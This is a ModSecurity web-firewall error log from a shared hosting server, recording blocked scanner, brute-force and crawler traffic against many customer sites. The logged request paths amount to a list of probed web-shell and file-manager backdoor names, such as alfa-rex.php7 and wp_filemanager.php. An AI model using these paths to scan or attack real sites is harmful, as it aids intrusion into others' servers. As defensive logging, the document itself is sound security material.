[Tue May 26 18:39:08.423879 2026] [security2:error] [pid 1015481:tid 1015606] [remote 103.11.102.22:45290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbdLQIKfWDMlp2INdNpQABbXw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:39:08.482653 2026] [security2:error] [pid 1015481:tid 1015607] [remote 57.141.2.29:23426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 29.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWbdLQIKfWDMlp2INdNpgABWH0"]
[Tue May 26 18:39:08.485476 2026] [security2:error] [pid 1015481:tid 1015646] [client 20.196.127.68:1127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/about.php"] [unique_id "ahWbdLQIKfWDMlp2INdN6AAAAS0"]
[Tue May 26 18:39:09.065684 2026] [security2:error] [pid 1015481:tid 1015643] [client 20.196.127.68:10699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/atomlib.php"] [unique_id "ahWbdbQIKfWDMlp2INdN9QAAASo"]
[Tue May 26 18:39:09.451998 2026] [security2:error] [pid 1015481:tid 1015697] [client 185.191.171.14:60022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWbdbQIKfWDMlp2INdN-wAAAWA"]
[Tue May 26 18:39:09.452224 2026] [security2:error] [pid 1015481:tid 1015697] [client 185.191.171.14:60022] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWbdbQIKfWDMlp2INdN-wAAAWA"]
[Tue May 26 18:39:09.714338 2026] [security2:error] [pid 1015481:tid 1015632] [client 20.196.127.68:1094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/alfa-rex.php7"] [unique_id "ahWbdbQIKfWDMlp2INdN_AAAAR8"]
[Tue May 26 18:39:10.359371 2026] [security2:error] [pid 1015481:tid 1015676] [client 20.196.127.68:9262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/b.php"] [unique_id "ahWbdrQIKfWDMlp2INdOCQAAAUs"]
[Tue May 26 18:39:10.573574 2026] [security2:error] [pid 1015481:tid 1015706] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbdrQIKfWDMlp2INdOBQAAAWk"]
[Tue May 26 18:39:11.026666 2026] [security2:error] [pid 1015481:tid 1015656] [client 20.196.127.68:1119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/buy.php"] [unique_id "ahWbd7QIKfWDMlp2INdOEQAAATc"]
[Tue May 26 18:39:11.443853 2026] [security2:error] [pid 1015481:tid 1015526] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbd7QIKfWDMlp2INdOEgABKSw"]
[Tue May 26 18:39:11.444110 2026] [security2:error] [pid 1015481:tid 1015642] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbd7QIKfWDMlp2INdOEgABKSw"]
[Tue May 26 18:39:11.663223 2026] [security2:error] [pid 1015481:tid 1015658] [client 20.196.127.68:2295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/bless.php"] [unique_id "ahWbd7QIKfWDMlp2INdOHQAAATk"]
[Tue May 26 18:39:12.306098 2026] [security2:error] [pid 1015481:tid 1015673] [client 20.196.127.68:1131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/class-t.api.php"] [unique_id "ahWbeLQIKfWDMlp2INdOJQAAAUg"]
[Tue May 26 18:39:12.994912 2026] [security2:error] [pid 1015481:tid 1015626] [client 20.196.127.68:3897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/cache.php"] [unique_id "ahWbeLQIKfWDMlp2INdOPQAAARk"]
[Tue May 26 18:39:13.231565 2026] [security2:error] [pid 1015481:tid 1015667] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbeLQIKfWDMlp2INdONQAAAUI"]
[Tue May 26 18:39:13.630556 2026] [security2:error] [pid 1015481:tid 1015715] [client 20.196.127.68:14090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/content.php"] [unique_id "ahWbebQIKfWDMlp2INdORAAAAXI"]
[Tue May 26 18:39:14.243164 2026] [security2:error] [pid 1015481:tid 1015670] [client 20.196.127.68:3880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/classwithtostring.php"] [unique_id "ahWberQIKfWDMlp2INdOTAAAAUU"]
[Tue May 26 18:39:14.485720 2026] [security2:error] [pid 1015481:tid 1015702] [client 14.235.247.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWberQIKfWDMlp2INdOSwAAAWU"]
[Tue May 26 18:39:14.885878 2026] [security2:error] [pid 1015481:tid 1015642] [client 20.196.127.68:5009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/css.php"] [unique_id "ahWberQIKfWDMlp2INdOUwAAASk"]
[Tue May 26 18:39:15.498204 2026] [security2:error] [pid 1015481:tid 1015685] [client 20.196.127.68:14886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/chosen.php"] [unique_id "ahWbe7QIKfWDMlp2INdOZAAAAVQ"]
[Tue May 26 18:39:15.788199 2026] [security2:error] [pid 1015481:tid 1015721] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbe7QIKfWDMlp2INdOYAAAAXg"]
[Tue May 26 18:39:16.108858 2026] [security2:error] [pid 1015481:tid 1015640] [client 20.196.127.68:14268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/doc.php"] [unique_id "ahWbfLQIKfWDMlp2INdOdQAAASc"]
[Tue May 26 18:39:16.692121 2026] [security2:error] [pid 1015481:tid 1015649] [client 20.196.127.68:6740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/elp.php"] [unique_id "ahWbfLQIKfWDMlp2INdOfQAAATA"]
[Tue May 26 18:39:17.094858 2026] [security2:error] [pid 1015481:tid 1015660] [client 130.131.224.225:64896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWbfbQIKfWDMlp2INdOfgAAATs"]
[Tue May 26 18:39:17.095034 2026] [security2:error] [pid 1015481:tid 1015660] [client 130.131.224.225:64896] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWbfbQIKfWDMlp2INdOfgAAATs"]
[Tue May 26 18:39:17.292110 2026] [security2:error] [pid 1015481:tid 1015706] [client 20.196.127.68:10881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/Exception-class.php"] [unique_id "ahWbfbQIKfWDMlp2INdOkAAAAWk"]
[Tue May 26 18:39:17.883097 2026] [security2:error] [pid 1015481:tid 1015733] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbfbQIKfWDMlp2INdOkwAAAYQ"]
[Tue May 26 18:39:17.960228 2026] [security2:error] [pid 1015481:tid 1015737] [client 20.196.127.68:14263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ee.php"] [unique_id "ahWbfbQIKfWDMlp2INdOnwAAAYg"]
[Tue May 26 18:39:18.566797 2026] [security2:error] [pid 1015481:tid 1015704] [client 20.196.127.68:10725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/edit.php"] [unique_id "ahWbfrQIKfWDMlp2INdOrQAAAWc"]
[Tue May 26 18:39:18.678037 2026] [security2:error] [pid 1015481:tid 1015673] [client 124.43.5.103:62258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbfrQIKfWDMlp2INdOrgAAAUg"]
[Tue May 26 18:39:18.678181 2026] [security2:error] [pid 1015481:tid 1015673] [client 124.43.5.103:62258] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbfrQIKfWDMlp2INdOrgAAAUg"]
[Tue May 26 18:39:19.157385 2026] [security2:error] [pid 1015481:tid 1015624] [client 20.196.127.68:4782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/f35.php"] [unique_id "ahWbf7QIKfWDMlp2INdOtgAAARc"]
[Tue May 26 18:39:19.751548 2026] [security2:error] [pid 1015481:tid 1015716] [client 20.196.127.68:6901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/fff.php"] [unique_id "ahWbf7QIKfWDMlp2INdOwQAAAXM"]
[Tue May 26 18:39:20.001312 2026] [security2:error] [pid 1015481:tid 1015675] [client 64.188.91.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbf7QIKfWDMlp2INdOxwAAAUo"]
[Tue May 26 18:39:20.161958 2026] [security2:error] [pid 1015481:tid 1015563] [remote 64.188.91.103:63322] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahWbgLQIKfWDMlp2INdOywABalE"]
[Tue May 26 18:39:20.325973 2026] [security2:error] [pid 1015481:tid 1015698] [client 130.131.224.225:63115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/ff.php"] [unique_id "ahWbgLQIKfWDMlp2INdO0AAAAWE"]
[Tue May 26 18:39:20.326107 2026] [security2:error] [pid 1015481:tid 1015698] [client 130.131.224.225:63115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/ff.php"] [unique_id "ahWbgLQIKfWDMlp2INdO0AAAAWE"]
[Tue May 26 18:39:20.419109 2026] [security2:error] [pid 1015481:tid 1015712] [client 20.196.127.68:14854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ff1.php"] [unique_id "ahWbgLQIKfWDMlp2INdO0QAAAW8"]
[Tue May 26 18:39:21.032428 2026] [security2:error] [pid 1015481:tid 1015620] [client 20.196.127.68:14244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/flower.php"] [unique_id "ahWbgbQIKfWDMlp2INdO4wAAARM"]
[Tue May 26 18:39:21.223699 2026] [security2:error] [pid 1015481:tid 1015708] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbgLQIKfWDMlp2INdO2AAAAWs"]
[Tue May 26 18:39:21.404445 2026] [security2:error] [pid 1015481:tid 1015726] [client 130.131.224.225:4112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/x.php"] [unique_id "ahWbgbQIKfWDMlp2INdO7wAAAX0"]
[Tue May 26 18:39:21.404590 2026] [security2:error] [pid 1015481:tid 1015726] [client 130.131.224.225:4112] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/x.php"] [unique_id "ahWbgbQIKfWDMlp2INdO7wAAAX0"]
[Tue May 26 18:39:21.622577 2026] [security2:error] [pid 1015481:tid 1015644] [client 20.196.127.68:14237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/file.php"] [unique_id "ahWbgbQIKfWDMlp2INdO8gAAASs"]
[Tue May 26 18:39:21.878183 2026] [security2:error] [pid 1015481:tid 1015550] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbgbQIKfWDMlp2INdO_AABdkQ"]
[Tue May 26 18:39:21.878360 2026] [security2:error] [pid 1015481:tid 1015719] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbgbQIKfWDMlp2INdO_AABdkQ"]
[Tue May 26 18:39:22.183182 2026] [security2:error] [pid 1015481:tid 1015482] [remote 216.73.216.30:13118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbgrQIKfWDMlp2INdO_wABTgA"]
[Tue May 26 18:39:22.205417 2026] [security2:error] [pid 1015481:tid 1015656] [client 20.196.127.68:2295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/goods.php"] [unique_id "ahWbgrQIKfWDMlp2INdPAAAAATc"]
[Tue May 26 18:39:22.573428 2026] [security2:error] [pid 1015481:tid 1015725] [client 130.131.224.225:51025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/tires.php"] [unique_id "ahWbgrQIKfWDMlp2INdPBwAAAXw"]
[Tue May 26 18:39:22.573574 2026] [security2:error] [pid 1015481:tid 1015725] [client 130.131.224.225:51025] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/tires.php"] [unique_id "ahWbgrQIKfWDMlp2INdPBwAAAXw"]
[Tue May 26 18:39:22.795675 2026] [security2:error] [pid 1015481:tid 1015702] [client 20.196.127.68:14269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/g.php"] [unique_id "ahWbgrQIKfWDMlp2INdPEwAAAWU"]
[Tue May 26 18:39:22.910041 2026] [security2:error] [pid 1015481:tid 1015611] [client 130.131.224.225:64414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-block.php"] [unique_id "ahWbgrQIKfWDMlp2INdPFQAAAQo"]
[Tue May 26 18:39:22.910172 2026] [security2:error] [pid 1015481:tid 1015611] [client 130.131.224.225:64414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-block.php"] [unique_id "ahWbgrQIKfWDMlp2INdPFQAAAQo"]
[Tue May 26 18:39:23.249071 2026] [security2:error] [pid 1015481:tid 1015685] [client 130.131.224.225:42382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-der.php"] [unique_id "ahWbg7QIKfWDMlp2INdPGQAAAVQ"]
[Tue May 26 18:39:23.249201 2026] [security2:error] [pid 1015481:tid 1015685] [client 130.131.224.225:42382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-der.php"] [unique_id "ahWbg7QIKfWDMlp2INdPGQAAAVQ"]
[Tue May 26 18:39:23.445440 2026] [security2:error] [pid 1015481:tid 1015688] [client 20.196.127.68:4794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/hplfuns.php"] [unique_id "ahWbg7QIKfWDMlp2INdPHAAAAVc"]
[Tue May 26 18:39:23.590763 2026] [security2:error] [pid 1015481:tid 1015721] [client 114.119.156.185:51449] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/our-objectives/"] [unique_id "ahWbg7QIKfWDMlp2INdPJAAAAXg"], referer: https://rohiniventures.com/coffee
[Tue May 26 18:39:23.761747 2026] [security2:error] [pid 1015481:tid 1015704] [client 130.131.224.225:37415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/ah25.php"] [unique_id "ahWbg7QIKfWDMlp2INdPMQAAAWc"]
[Tue May 26 18:39:23.761836 2026] [security2:error] [pid 1015481:tid 1015704] [client 130.131.224.225:37415] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/ah25.php"] [unique_id "ahWbg7QIKfWDMlp2INdPMQAAAWc"]
[Tue May 26 18:39:23.919479 2026] [security2:error] [pid 1015481:tid 1015617] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbg7QIKfWDMlp2INdPIAAAARA"]
